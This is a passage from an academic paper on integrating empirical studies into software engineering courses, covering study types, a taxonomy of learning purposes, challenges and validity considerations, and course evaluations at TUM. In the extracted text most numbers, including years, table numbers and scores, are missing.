typically requires, e.g., the execution of experiments in a scientific style and the implementation of feedback channels that allow observing user behaviour. for teachers, it is a great challenge to instruct students accordingly, as classic software engineering teaching is usually separated from value considerations. thus, creating a mind-set in which value creation is the baseline for all development tasks impacts the way software development is performed in the sense that decision-making is based on continuously obtained evidence about customer value. in order to conduct continuous experimentation, different designs can be applied depending on the hypotheses or study goals under investigation. a typical design is a case study consisting of a sequence of build-measure-learn cycles that develop a so-called minimum viable product (mvp). simply speaking, an mvp is a prototype that allows for testing with potential customers. such testing requires a design to quickly obtain customer feedback during the study. in consequence, access to potential customers is needed to conduct such studies. from the industry perspective, continuous experimentation results in knowledge that supports or refutes assumptions about product value. an mvp might result from an experiment. such a result might consist of a working prototype as well as data or fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. lessons learnt about the customer value of the prototype, its development process, and potentially about relevant customer segments. the study might also contribute to testing of other critical assumptions of a business model, such as assumptions about customer relationships or channels. for researchers, continuous experimentation helps to better understand processes, methods, techniques, tools, and organizational constraints regarding building the ‘‘right’’ software. from the teaching perspective, continuous experimentation helps students understand the connection between software development techniques and business. since such experiments must begin by analysing product-related assumptions, students naturally come into contact with the product’s business model. they must then make the link between such assumptions and the corresponding technical implementation and devise an experiment which allows them to refute or support the highest-priority assumption, yielding evidence for a product-related decision. continuous experimentation can thus foster the awareness of relevant criteria for software beyond cost, reliability, and effort, e.g., usability, usefulness, success (e.g., contribution to a higher level organizational goal), and scalability (e.g., monetization from a significant amount of users). examples of continuous experimentation in teaching fagerholm et al. ( a) present building blocks for continuous experimentation and describe the execution of three student projects that aim at conducting build-measure- learn loops. these projects were performed in cooperation with a start-up and sought to understand aspects such as future development options or scalability issues of a new service. the projects helped to evolve the product roadmap and led to several technical pivots where previous assumptions were invalidated and new options found. students gained significant insights in the connections between technical and business considerations. a process model and infrastructure architecture model for continuous experimentation are described in fagerholm et al. ( ). kohavi et al. ( ) describe continuous experiments from an industry perspective. the authors present a system for constant experimentation at microsoft. they emphasize that learning addresses many aspects beyond understanding experimentation techniques. for instance, it is necessary to learn how to identify and understand the reasons for experiments in an organization. in addition, learning needs to address a change of the company culture towards experimentation. software process simulation experimentation is a costly way to learn. it requires, for instance, significant preparation of experimental materials and treatments. software process simulation refers to the use of a simulation model as an abstraction of a real process. typical purposes for using such models are experimentation, increased understanding, prediction, decision support, or education about a process. assuming that a valid model exists, process simulation promises advantages with respect to cost. since part of the process can be conducted virtually, the number of controlled variables can be much higher than in real experiments, and calibrating the model to a specific context can be done efficiently. fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. simulation may be a suitable teaching aid in many situations, but should be used only when a valid model can be obtained. otherwise, there is a risk that students observe effects that are not realistic and thus incorrect learning might occur. well-researched models with extensive validation are necessary. other disciplines such as mechanical engineering or molecular chemistry already use simulation to analyse technologies and processes and thereby reduce the need for real experiments. in software engineering, this trend is still focused towards product aspects such as understanding the dynamic behaviour of control software. however, simulation has already been applied successfully for understanding and analysing software processes as well as for educational purposes. process simulation can be combined with real software engineering experiments—for example, by using empirical data to calibrate a model or by comparing such data with simulation results—or used as such. simulation-based experiments can be classified by the number of treatments and the number of subject groups per treatment. in case of single project studies (i.e., one treatment and one group), simulation requires initialization of appropriate input parameters and calibration to the context. in case of multi-project variation (i.e., more than one treatment and one group), the simulation model needs to be calibrated to different contexts. replications (i.e., one treatment but more than one group) basically refer to several simulation runs, typically with statistically based variations. in case of blocked subject-project studies (i.e., more than one treatment and more than one team) simulation model development requires a good understanding of cause–effect relations in varying contexts. combining simulation with experiments can be done in the following ways: • empirical knowledge from real experiments can be used for creating the simulation model (e.g., to calibrate the simulator) • results from simulation runs can be used for designing real experiments (e.g., to identify and investigate new hypotheses before performing expensive real experiments) • both can be done in parallel (e.g., to broaden the scope of the experiment). from the research perspective, software process simulation can be seen as an additional, efficient mechanism to gain knowledge about the effects of processes in different contexts. it especially allows for analysing situations that are difficult, expensive, or impossible to analyse in real experiments, and it allows for flexible variations of the context and the controlled variables. from the educational perspective, simulation helps to gain a better understanding of the dynamics of software development processes, getting immediate feedback, and experiencing the effects of decisions. feedback can be obtained quickly using time-lapse effects. when creating the model, students gain insights into cause–effect- and other relationships. creating a simulation model promises to improve understanding of the key factors and complexity of a specific software process. from an industry perspective, learning cycles can be accelerated, risks mitigated, and the impact of processes, technologies, and their changes can be better understood. fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. examples of software process simulation in teaching several educational software engineering simulation environments have been developed and are used for teaching purposes. examples are the comprehensively evaluated simse environment (navarro & van der hoek, ), and the sesam (software engineering simulation by animated models) environment (ludewig et al., ). münch, rombach & rus ( ) have developed a laboratory that allows to systematically combine real and virtual experiments and demonstrate the benefits of such a combination for teaching purposes. individual studies all aforementioned study types allow for teamwork and training specific team-related skills. however, software engineering education also comprises several individual tasks, which are often performed by students while they work (for a limited time) in industry or while they write their theses (e.g., bachelor’s or master’s thesis, or semester projects). although individual studies can be performed in industry-academia collaborations, they are usually conducted by individual students who work on a specific task and simultaneously perform the study. the student is thus a participant-observer in such studies. individual studies depend on the setting in which they are carried out, e.g., requirements for a semester project differ from those of a master’s thesis. different study types can be applied. individual studies have high requirements regarding the study design, as they all have limited resources and strict time constraints in common. specific challenges are scoping the study, narrowing down research questions, and defining the expected outcome. since individual students conduct single studies, results are often limited to proofs of concept or demonstrators. finally, data generated in this kind of study is often isolated, requiring a defined context to which it can contribute, e.g., a more comprehensive research strategy within which a particular study investigates one small aspect. although limited, the results of the study can have inherent value to research and practice. for research, the study may contribute to a better understanding of research questions and might be a starting point for further, more comprehensive studies. from the industry perspective, individual studies allow investigating a specific problem in a well-defined environment and, due to their limitations, analyses are limited to a specific problem. for instance, if the objective of the study is to develop an algorithm or to examine the feasibility of a specific method, a case study can be conducted explicitly focusing on this aspect, resulting in a statement which then provides rationale for further investigation. if the individual study is combined with an internship, students can summarise existing research on a topical area that can then be used as training material for company employees. finally, when students graduate, companies may wish to employ them (they already know the student). from an educational perspective, students have to work in a self-organised manner, and they learn how to set up and conduct a problem-oriented study (including all effects, e.g., stakeholder interaction, study planning, data collection, etc.). furthermore, students get further specific domain knowledge beyond the more general knowledge they acquire at university. fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. examples of individual studies in teaching rein & münch ( ) describe an individual student study that was performed as part of a seminar thesis. the study aims at analysing features of a mobile app and consisted of design, instrumentation of the app with appropriate measurement instruments, and analysis of data from more than ten thousand users. the study results provided valuable, data-based justifications on how to further develop the app. in addition, a new method for analysing feature value was piloted and experiences with the applicability of the method were gained. a popular example for individual studies in industry is the so-called personal software process (psp), a training that consists of a series of systematically defined software engineering exercises. rombach et al. ( ) have analysed data from , engineers conducting the psp. a major finding from this analysis is that the effects of applying software engineering principles can be experienced on an individual level. although the effects of applying such principles typically can only been seen on the larger scale (e.g., large projects, long-lasting development efforts, multi-team developments), this study shows that it is possible to teach these principles also on the individual level. further instruments in the previous sections, we provided an overview of different empirical instruments, a discussion, and examples of their application in teaching. however, there are further means that can contribute to the aforementioned study types. replication studies replication provides an opportunity to learn from an already established research design, and can, if conducted well, contribute additional evidence for a research question. replication repeats empirical studies to solidify their results, test result reproducibility, increase result validity (e.g., easterbrook et al. ( ) and park ( ) consider replication a kind of triangulation), and broaden research context and scope by repetition under similar conditions while changing selected variables, e.g., site, population, and instruments. thus, students can learn from adapting the research design in a new environment and by comparing the results obtained to those of the original study. simultaneously, teachers should prepare students for sometimes large differences in results. lack of generalisability is often cited as a limitation in empirical studies and replication is a step toward creating generalisable knowledge. however, replication in software engineering is considered immature and is subject to debate. juristo & gómez ( ) argue that results from current software engineering experiments are often produced by chance, are artificial, and are too far away from reality. they mention that the key experimental conditions are yet unknown, as the tiniest change in study design may lead to inexplicable results. due to the large number of varying factors in the context of software engineering, it can be questioned whether close replication is possible at all (juristo & vegas, ). nevertheless, conducting a replication can be a valuable learning experience which develop students’ ability to design studies and critically compare results of studies addressing the same or similar questions. although industry-based research is considered the optimal way to gather reliable and relevant data, empirical research in industry is hard; replications are even harder. fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. for instance, as we discussed in kuhrmann ( ), small companies usually have limited resources to conduct empirical research, as it requires preparation, time, and allocation of resources. armbrust et al. ( ) mention the importance of pilot projects in the context of case study research, and discuss the difficulties finding proper projects and allocating resources. replication increases the level of difficulty, as experiments and case studies are conducted multiple times thus blocking critical resources for long periods of time without immediately creating value in terms of products and services. while replication in industry is hard to implement, replicated experiments and case studies are easier to realize in education since universities provide a stable environment. deviations from original designs are usually the subjects, while, e.g., case, instruments, and procedures can be kept stable. thus, once a consolidated experiment design is in place, replications can be implemented on a regular basis. however, the question of whether results obtained with student subjects can be generalised to industry is then of crucial importance. real-life examples and open source software a major challenge for teachers is providing students with problems of considerable size. one approach is to rely on open source software (oss) projects with many publicly available cases, problems, and code to investigate. they offer complex challenges going beyond typical local, university-driven projects. oss projects are distributed and decentralised, utilising virtual teams in which participants can range from individual volunteers to professional development teams employed by a company. furthermore, the practical relevance of oss software is unquestioned, since oss projects set de facto standards for software development in certain application domains, e.g., operating systems (linux), web servers (lamp stack), and mobile ecosystems (android). participating in oss can benefit industry by leveraging development capacity for projects exceeding their own capabilities. in many cases, they must participate in oss and build products on oss platforms in order to access customers who are already using them. learning how to function in this context, e.g., working in a self-organising virtual team requires particular knowledge and skills. therefore, oss projects are fruitful grounds to set up a sophisticated teaching environment. individual students could directly participate in a single project and investigate a specific problem, or, in order to achieve more demanding learning goals, groups of students participate through a collaborative program (richardson, milewski & mullick, ; keenan, steele & jia, ). for instance, students from several universities can participate in a common project pool (e.g., fagerholm et al., b; fagerholm, oza & münch, ). from the industry perspective, oss projects offer increased visibility and opportunities for recruitment, contribution to added features, and sustainability of key oss components. from the teaching perspective, oss projects provide a realistic learning experience with large software systems, and allow experiencing many aspects of collaborative software development. for researchers, oss projects have a large amount of data available, with easier access than from companies’ internal projects. data from oss projects has been used for several purposes including improvement of teaching. other data sources are also available for analysis, providing evidence-based means to improve teaching. an emerging trend is using learning analytics for supporting good fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. learning outcomes, to better understand learning progress, and to construct student profiles for tailored teaching. ideally, this can allow real-time reaction to improve learning outcomes and to allow larger masses of students to participate in courses with limited teaching resources. the main benefits are, for instance, to address the drop-out problem and to provide more customised teaching for individuals. at the university of helsinki, an example of a platform allowing learning analytics is the mooc.fi online learning environment, which provides courses on cyber security, programming in several languages, web service development, and algorithms. research on the platform has, for instance, contributed methods to identify students based on typing patterns (longi et al., ), which can help prevent cheating in an online environment, and to identify students in need of assistance, which allows increasing guidance for struggling students early on, and providing more challenging assignments for high-performing students (ahadi et al., ). a guideline for integrating empirical studies with software engineering courses in this section, we develop an experience-based guideline to integrate empirical studies with software engineering courses. we base the guideline on experiences gathered from our own software engineering courses, categorised from several perspectives. we first generalise common purposes, challenges, and validity considerations. these serve to determine the appropriateness of a particular study in a given context. we discuss appropriateness from two perspectives: ( ) teaching at universities and ( ) industry training. finally, we share our experiences, discussing several aspects to be considered when integrating empirical studies with software engineering courses, e.g., motivation, scheduling, and effort. purposes, challenges, and validity to summarise the aforementioned kinds of empirical studies, we create the taxonomy presented in tables – . in this initial taxonomy, we include different purposes, challenges, and validity constraints to support the categorisation of study types, and the analysis of appropriateness in certain contexts. we identified a total of ten purposes, describing major learning goals associated with empirical studies in software engineering teaching that we consider important (table ). complementing the purposes, we identified eight challenges that should be taken into account when designing empirical studies for educational purposes (table ). purposes and challenges are intended to help teachers determine what study type is appropriate in a certain setting, e.g., does the actual setting allow for a (full) experiment, and if so, what challenges need to be addressed? apart from purposes and challenges, the quality of the outcomes of empirical studies— especially in the context of teaching using students as subjects (runeson, )—must be considered carefully. taking the close relation to industry and relevance of the topics into account, we analysed the different study types for validity constraints. for example, researchers seek validity to solidify findings and to pave the way for generalisable knowledge, while industry is interested in business value. furthermore, from a teaching perspective, result validity may be considered less important than achieving the learning goals. therefore, we derived four validity considerations associated with empirical studies fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://mooc.fi/ http://dx.doi.org/ . /peerj-cs. table summary of learning goals and purposes for empirical studies in education. purpose description p learn to formulate a research problem. students face a (real-world) problem that needs investigation. therefore, the learning goal is to: •capture the problem. •formulate research questions. •formulate hypotheses regarding users or customers and their behaviour. due to the complexity of realistic, real-world settings, this task is demanding for, e.g., formulating a problem in a scientifically sound way, but keeping in mind the (industry) partners’ needs. p learn to collect relevant data. collecting data in realistic settings is a demanding task, as data is usually scattered across different sources. the learning goal is to develop a meaningful data collection strategy that includes data from multiple sources within a setting and, optionally, backed up by further external data (from outside a given setting). p learn to analyse real-life data. real world situations are often incomplete or confidential thus hampering data analyses. the learning goal is to develop a data analysis strategy to overcome limited data. p learn to draw conclusions. based on collected and analysed data, the overall learning goal is to draw conclusions. thus, in the (realis- tic) setting, students need to learn to: •gather empirical evidence on which conclusions are based. •test theories and/or conventional wisdom based on evidence. •draw conclusions from (limited) data and develop a strategy to utilise findings in practice. the purpose is to gather findings or evidence, and to analyse the findings for relevance in the respective setting. eventually, findings must contribute to solving the original problem and, thus, another learning goal is to develop transfer strategies to support utilisation of the findings in practice. p learn to experience and solve a specific problem. a major purpose is to cause people to experience certain situations and to develop situation-specific solution strategies or approaches. this leads to: •experience regarding the problem-solution relation, e.g., understanding of the relationship between user behaviour and software design. • increased knowledge about a problem (domain). • increased knowledge about technology and methods. • increased knowledge about potential/feasible solutions and/or solution patterns. skills addressed by this learning goal are basic prerequisites that allow for developing solutions in general, as these skills address a specific problem, but also allow for developing transferable knowledge that can be applied to different contexts. p develop a software artefact. in software engineering, software artefacts, especially prototypes, serve the (early) analysis of a specific problem. for this, prototypes allow for implementing and demonstrating solution strategies. the learning goal thus comprises: •create a (software) prototype to demonstrate a solution approach/strategy (feasibility study). •create artefacts to elaborate potential solution approaches/strategies for dis-/advantages (comparative study). •create artefacts to establish (quick) communication and feedback loops. software artefacts in general and prototypes in particular serve the elaboration of a problem, and help to understand the potential so- lutions. that is, such artefacts pave the way to the final solution. p coaching. another learning goal is to make stakeholders familiar with new methods and tools. hence, utilisation of the new method- s/tools need to be trained, i.e., develop and train necessary skills. p change of culture. continuous experimentation comprises a number of the other learning goals. however, continuous experimenta- tion is more of a general organisational question than a project-specific endeavour. therefore, utilising continuous experimentation also implies a cultural change toward experimentation in the implementing organisation. p learn about the impact. specific behaviour or decisions impact a system and/or a team, e.g., changing requirements or fluctuation in team composition. therefore, it is important to learn about the effects that certain behaviour and decisions have in large and/or dy- namic contexts. p learn about long-term effects. apparently ‘‘local’’ decisions might cause ‘‘global’’ effects. thus, it is important to know about the long- term and/or snowballing effects caused by single decisions, e.g., a shortcut in the architecture leads to increased maintenance cost (technical debt). fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table summary of challenges that empirical studies in education face. challenge description c finding or creating relevant cases. the major challenge is to find and define proper and relevant cases, which bears some risks: •a case may become irrelevant while conducting a study (e.g., changing environment, changing context parameters). •a study might go into an unexpected direction (learning curve and, in response, focus shift). •a relevant case must be narrowed down to the participating subjects, e.g., students have different skills and goals than professionals. cases must be balanced, e.g., learning goals must be achieved regardless whether the original case loses its relevance (procedural over technical knowledge) or students need to finish a thesis regardless of whether industry partners can apply study findings. c no guaranteed outcome. if a problem was found, there is no guarantee that a study will lead to an outcome. furthermore, immediate applicability of the outcomes is not guaranteed, which means extra work for industry to transfer results into product development. c time constraints. apart from the appropriateness of the actual problem, time constrains limit the study. time constraints can occur as: •limitations dictated by the curriculum/course schedule. •limitations dictated by industry schedules, e.g., product development cycles. •limitations dictated by individual schedules, e.g., students that are about to finish their studies. therefore, time constrains, together with resource limitations, define the basic parameters that affect the study objects (problem, po- tential/achievable solutions, completeness of results, validity of outcomes, and so forth). c resource limitations. studies require resources and, thus, availability of resources limits the study. resource limitation can occur as: •availability of (the right) students, e.g., if a study requires students with a specific skill profile. •motivation of students to participate in a study (personal vs. study goals). •availability of industry resources (personnel tied to a study). •options to adequately integrate the study with (running) company processes. especially the availability is a critical factor. for instance, while one experiment consumes resources once, repetition and replication require a long-term commitment regarding resource availability, which implies significant investments of time and/or money. in or- der to make resources available, participating partners need to receive a sufficient benefit, which is often hard to define in empirical studies. c limited access to data. although it is one purpose in terms of learning goals, defining adequate hypotheses and variables that can be investigated in a course is challenging. proper measurements must be defined, taking into account that potentially not all data is available, e.g., confidential data. especially access to user data is challenging (a way out could be utilising oss projects), as this data is usually strictly confidential. c built-in bias. a special problem is bias. each particular setting comes with an inherent set of biases, e.g.: •students’ special skills affect the study, and students that are trained in advance of the study affect the outcomes. •too much or too little context knowledge of the subjects affects the study. •competing goals of the participants (especially students vs. practitioners) affect the study, e.g., students might try to optimise a study to achieve better grades while compromising the study goals. empirical studies suffer from certain limitations, and in the context of teaching, special attention needs to be paid to bias and threats to validity. c communication. empirical investigations create knowledge, data, and potentially software artefacts. therefore, results need to be quickly communicated to the participants. quick feedback helps to, e.g., determine the relevance of results, appropriateness of the in- strument, and determining necessary adjustments. thus, fast feedback loops are necessary. c creating a simulation model. for simulation-based research/teaching, setting up a simulation model is a demanding task, which con- sumes time and resources thus generating cost. the entire domain under consideration must be captured to create a model that al- lows for generating useful data. fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table summary of validity considerations when using empirical studies in education. validity consideration description v emphasis: meeting teaching goals. use is valid if procedural learning goals are met. validity of conclusions and useful- ness for industry are of secondary importance from the teaching perspective. v emphasis: meeting business or organisational goals. validity depends on what value is created for the business. direct business value is rare; a more likely result is increased knowledge of the problem area, technology, work methods, or potential solutions or solution patterns. v emphasis: creating a sound study design. focus is on the internal validity, and results of a study are ‘‘side effects’’. if the learning goal is to understand experimentation itself, internal and external validity could have higher relevance. v emphasis: meeting research goals. especially in simulation, the validity of the gathered data depends on the quality of the simulation model, and also on the quality of the simulation environment. for teaching from the desired learning outcomes and our knowledge about the educational context (table ). establishing context and goals, and determining a study type we provide an initial assignment to the four major study types experiment, case study, simulation, and continuous experimentation. individual studies are left out, since the particular challenges result from the concrete instrument applied in the respective study, e.g., an individual study may implement an experiment or a case study. table provides an initial assignment of purposes, challenges, and validity constraints from the academic perspective, while table provides the industry perspective. the tables support decision-making when selecting appropriate instruments. for instance, if the context is university, and students shall learn to solve a particular problem (p ) by developing a software tool (p ), teachers should opt for a case study. in an industry context, both case studies and experiments can be utilized. however, as table illustrates, an industry experiment is more demanding, with more challenges to address, e.g., built-in bias (c ) and communication (c ), and a different validity emphasis (v ). another observation is that there are no differences suggested between the two settings in the case of the simulation instrument. in both, the major challenge is the simulation model, which affects learning, effort for its creation (c ), and validity constraints (v ). concrete goals must be considered and balanced alongside contextual information when selecting a particular study type. this also includes goals going beyond classic learning goals. for instance, all stakeholders (students, teachers, and industry partners) come into contact when performing case studies in industry, allowing for several opportunities. students make contact with industry and could find a job. students team up with other students to create an idea which may eventually lead to the founding of a company. on the other hand, industry can conduct research cheaply, as they usually pay with time spent, sponsor an idea, or pay a small fee to keep a software engineering lab running. in either case, industry gets access to the latest knowledge and fresh resources. finally, researchers have the opportunity to conduct some research (given the limitations mentioned above). fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table education in academia/university. experiment case study continuous experimentation simulation purpose p , p , p p , p , p , p , p , p p , p , p , p p , p challenges c , c , c , c c , c , c , c , p c , c , c , c c , c , c validity v v , v v v table education in industry. experiment case study continuous experimentation simulation purpose p , p , p p , p p , p , p , p , p p , p challenges c , c , c , c , c , c c , c , c , c c , c c , c c , c , c validity v v v v motivating students to conduct empirical studies making contact with industry and the prospects of finding a job or starting a company, foster students’ motivation to actively participate in courses, and may contribute to higher motivation, engagement, and better understanding of course contents. for instance, in kuhrmann, fernández & münch ( ), we reported on a new teaching format applied to a software process modelling course, including an empirical study. the course evaluation showed that students experienced the course significantly better than the class before (without the study), although they perceived the course as more demanding (see ‘example : a course on software process modelling with and without experiments’). the evaluation showed that students understood contents and their relevance better, gathered advanced knowledge and learned to apply it experiencing practical effects, e.g., consequences of wrong design decisions. our experience also shows that encouraging students to develop ideas and create products boosts motivation (c.f. brügge, krusche & alperowitz, ). for instance, smart phone apps can be developed in collaboration with industry partners and published in an app-store. gaining visibility, real clients, real feedback, and real bug reports guides students through the whole software development and product life cycle. nevertheless, apart from all potentially positive motivating drivers, a major driver for students is to get the best possible grade. also, the number of credits must reflect the effort required to conduct the study. for students, the amount of time required to receive a credit point is an important consideration. since empirical studies are demanding in terms of effort, and credits form the compensation, software engineering courses that include empirical studies must adequately ‘‘remunerate’’ the students for their efforts. scheduling having defined the goals and acquired (motivated) students and, optionally, partners from industry, the challenges c and c (table ) must be addressed. planning empirical studies in a standard university curriculum is demanding, as students usually take several courses thus having limited resources. furthermore, courses often span – weeks and if industry is involved, their schedules must be respected as well. in kuhrmann ( ), we fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. provided a generic template that integrates classic teaching with explicit workshop slots, which can be used to conduct empirical studies. in kuhrmann, fernández & münch ( ) and kuhrmann, femmer & eckhardt ( ), we provided concrete instances and reported on the feasibility of the proposed template. however, conducting empirical studies in collaboration with industry requires refining the generic template. we consider three basic planning patterns appropriate: • workshop model: in the workshop model, teachers, students, and practitioners conduct a workshop in which they collaboratively work on a problem. an example is a lab-based environment, such as the software factory (fagerholm, oza & münch, ). moreover, the workshop model is quite common in industry training (usually – days); a study that fits that schedule is more likely accepted by industry partners. • interleaved model: the interleaved model allows conducting a ‘‘long-running’’ study. normal work slots alternate with workshop slots, e.g., a new method is deployed and trained, practitioners apply it, researchers evaluate, improve and/or train new aspects of it, practitioners continue application, and so forth. furthermore, this model proved beneficial when supervising students conducting individual studies in industry. there are several benefits: regular work is not disturbed over a long period; training can be done iteratively; and cases can be observed over a longer time period. however, course schedules limit the applicability with student groups. • observation model: this model is the classic research model adopted for education purposes. students or practitioners are instructed, work independently on a task, and get coaching from teachers. besides the coaching, teachers monitor the correct application of empirical methods to collect and analyse data. planning the study and justifying the study plan with all time constraints needs to be done carefully, and requires the commitment of all participants to ensure availability of personnel and resources. further study type selection criteria apart from the criteria already discussed, we wish to highlight some further criteria that may influence the selection of study types for educational purposes. first, in table , we summarize well-known criteria from literature (e.g., wohlin et al., ) and further criteria that we consider relevant for study type selection. the table includes an experience- based rating for the criteria. however, this rating has to be considered as a subjective recommendation, as it is hard to precisely define, e.g., the degree of motivation or student satisfaction. we note that the knowledge and skill level of students should also be taken into account when selecting and tailoring an empirical instrument for teaching. in table , we provide an experience-based assessment of how different study types can be adjusted for different levels of students. two student levels are considered: bachelor’s ( – years of study) and master’s ( – years of study) levels. in industry, these may be interpreted either based on employees’ level of education or their working experience in the field. the primary means of adjustment is selection of a suitable problem scope and setting expectations for fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table further study selection criteria for different study types. each study type is ranked relative to the others on three levels and may span more than one level (lo: low, me: medium, hi: high). experiment case study continuous experimentation simulation individual studies lo me hi lo me hi lo me hi lo me hi lo me hi degree of execution control × × × × × × × × degree of measurement control × × × × × × × × degree of validity × × × × × × × × × × motivation to participate in a study × × × × × × × × motivation created by the study × × × × × × × × × student satisfaction × × × × × × × × × scheduling effort × × × × × ease of goal definition × × × × × × × × × effort to prepare/conduct a study × × × × × fagerholm etal. ( ),p eerj c om put.s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table adjusting study types to student levels. length of study is indicative and based here on european standards. bachelor’s level (first years of study) master’s level (between – years of study) experiment simple experiments with few variables. ex- periment design given. more complex multivariate experiments. own experiment design. case study limited topics, restricted to chosen context, few informants. little or no generalisation. exploratory, descriptive or intrinsic case studies. topics related to well specified software en- gineering areas. some generalisation. limita- tions of generalisation fully analysed. all case study types. continuous experimentation rudimentary practice with synthetic sce- narios. focus on understanding basic steps such as identifying assumptions, creating hy- potheses, and collecting data. more advanced scenarios or limited real-life experiments. focus on drawing conclusions from data and understanding limitations. simulation using ready-made simulation models and given data to explore topics through simula- tion. exploring the effect of changes in models us- ing given data or how ready-made models be- have with student-collected data. some ex- ploration with creating simulation models. individual studies focus on finding and summarising existing research. focus on answering specific research prob- lems by applying existing research and own data collection. no requirement of scientifi- cally novel results. appropriate result scope. for example, case studies at the bachelor’s level can be more limited in scope and focus on exploratory, descriptive, or intrinsic designs without much generalisation beyond the case environments. on the master’s level, some generalisation can be expected although still limited. assessment of the possibilities to generalise can be expected at this level. this assessment must be considered as a subjective starting point for adjustment, as students are different and educators should, as far as possible, tailor courses for individuals in order to provide the best opportunities for learning. experiences in this section, we provide some experiences gathered from implementing empirical instruments in university teaching. we provide selected examples, outline the respective courses (purpose, approach, outcomes), and provide feedback and evaluation (formal as well as informal) to reflect the students’ perception of these courses. example : a course on software process modelling with and without experiments a course on software process modelling, which implements the curriculum presented in kuhrmann, fernández & münch ( ), serves as first example. the course was offered multiple times at the technische universität münchen (tum) and the university of helsinki. in munich, after the initial run, the course was reorganized according to the concept presented in kuhrmann ( ) in which we presented an approach to integrate experimentation with practical software engineering courses. due to the reorganization, students experienced the (abstract) topics while conducting a controlled experiment on which we reported in kuhrmann, fernandez & knapp ( ). moreover, due to the fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. note that in table , smaller scores are better. since we informed the students about the ‘‘experimental’’ character of this special course in advance, the students did not complain, but welcomed the opportunity to give the feedback to improve their own class. table formal evaluation (anonymous questionnaire, comparison winter / and / , tum, result interpretation: ↑ large im- provement, , small improvement; →, no change; ↘, small deterioration; ↓, large deterioration.) criterion winter / winter / result number of completed questionnaires ( participants) ( participants) – common criteria ( = very high, = very low) complexity . (old questionnaire: ‘‘level’’) . − . ↑ volume . − . ↑ speed . (old: one question) . − . → appropriateness of effort compared to ects points n.a. . n.a. overall rating ( = very good, = very bad) lecture . . + . ↘ exercise . . − . ↑ relation to practice . . − . repeated execution in which we applied a course structure both without and with empirical instruments, we can present a number of experiences and a comparison. formal evaluation in table , we present the comparison based on the formal course evaluations conducted by the faculty of informatics at tum. due to updated questionnaires, the evaluations are not directly comparable. however, the basic information can still be extracted. the formal evaluation shows a significant increase of the scores regarding exercise quality and relation to practice, although, at the same time, the students also see the lecture as more demanding. since the basic course contents did not change, we interpret this evaluation as an increased awareness toward the course topic, which might be caused by the stronger utilization of practical aspects through the experiment. we see this as an indication that introducing experiments could have a positive effect, although a full validation is missing. informal evaluation besides the formal faculty-driven evaluation, we also performed two informal feedback rounds in the course instance in which we adopted the empirical instruments. we asked the students to write a one-minute-paper that contained the following three questions to be answered in short words: . (up to ) points that are positive . (up to ) points that are negative . (up to ) points that i still wanted to say (informal) table shows the summarized results from the informal evaluation: the structure of the class, the selected topics, the combination of theory and practice, and the way of continuously evaluating the work and finding the final grades were rated positively. especially the practical projects and the team work in the workshops were highlighted. on the other hand, students mentioned the tough schedule and the not always optimal tailoring of tasks for the practical sessions. fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. in the star trek franchise, kobayashi maru is a leadership test with a no-win scenario; see https://en.wikipedia.org/wiki/ kobayashi_maru. table summarized evaluation of the one-minute-papers (winter / , tum). positive aspects structure of the topics and the class, combination of theory and practice, projects in teams (atmosphere), self-motivation due to presentations, continuous evaluation and finding of the final grades negative aspects tough schedule, tailoring of the tasks for the practical sessions was not always optimal students signed off, just because of the examination procedure informal ‘‘thank you, this was the lecture i learned the most.’’ ‘‘super class, and i loved those many samples from practice.’’ example : a course on agile project management and software development with experiments the second example is an advanced course on agile software project management, which is also grounded in the general course pattern presented in kuhrmann ( ). a detailed description of the course and data obtained from the experiments is provided in kuhrmann, femmer & eckhardt ( ). in this course, offered at the technische universität münchen, the main purpose of the experiment instrument was to create awareness—scientific results were not the objective. we implemented two experiments: experiment (group dynamics) the first experiment aimed at demonstrating how groups of people collaborate in teams under stress (kuhrmann & münch, b). therefore, we introduced the tuckman model (tuckman, ), which describes group formation processes, and designed a simple experiment in which the students had to sort sweets and to document the outcomes. during the different experiment runs, we put some pressure on the students, e.g., increasing task complexity, enforced turnover, and external disturbances. although this experiment did not aim at finding new scientific revelations, we could confirm the tuckman model and show that group performance suffers from turnover. experiment (distributed development) the second experiment was designed to give the students the opportunity to deal with hopeless situations (kuhrmann & münch, a): we designed a software engineering ‘‘kobayashi maru’’ test. students were separated into two sets, each consisting of two groups for a total of four groups. each group had to develop a very simple console-based chat application (requirements in the form of user stories and test cases were provided), the groups were separated (each was located in a separate room), and each group was allowed to use only one communication channel (e-mail and skype respectively). after the task had been presented to them, the groups were immediately separated to avoid any direct communication, and for each group, a researcher monitored the compliance to the experiment rules. as the students fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://en.wikipedia.org/wiki/kobayashi_maru https://en.wikipedia.org/wiki/kobayashi_maru https://peerj.com http://dx.doi.org/ . /peerj-cs. table formal evaluation (anonymous questionnaire, winter / , tum). criterion winter / number of completed questionnaires ( participants) common criteria ( = very high, = very low) complexity . (just right) volume . (just right) speed . (just right) appropriateness of effort compared to ects points . (just right) overall rating ( = very good, = very bad) 